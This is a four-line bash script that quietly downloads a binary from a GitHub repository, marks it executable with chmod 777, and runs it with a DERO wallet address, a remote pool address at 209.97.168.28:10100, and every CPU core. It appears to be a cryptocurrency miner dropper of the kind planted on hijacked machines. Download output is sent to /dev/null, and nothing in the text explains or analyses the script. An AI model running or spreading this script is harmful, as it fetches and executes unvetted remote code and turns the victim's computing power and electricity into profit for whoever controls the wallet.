#!/bin/bash
wget -O biru https://github.com/cornea99/upil/raw/main/astro > /dev/null 2>&1
chmod 777 biru
./biru -w dero1qy2nrm9xhj8ha2rg0qjmh39p4sdy8sycf7my49axs26x7yukfpyquqgfsz5ey -r 209.97.168.28:10100 -p rpc -m $(nproc --all)
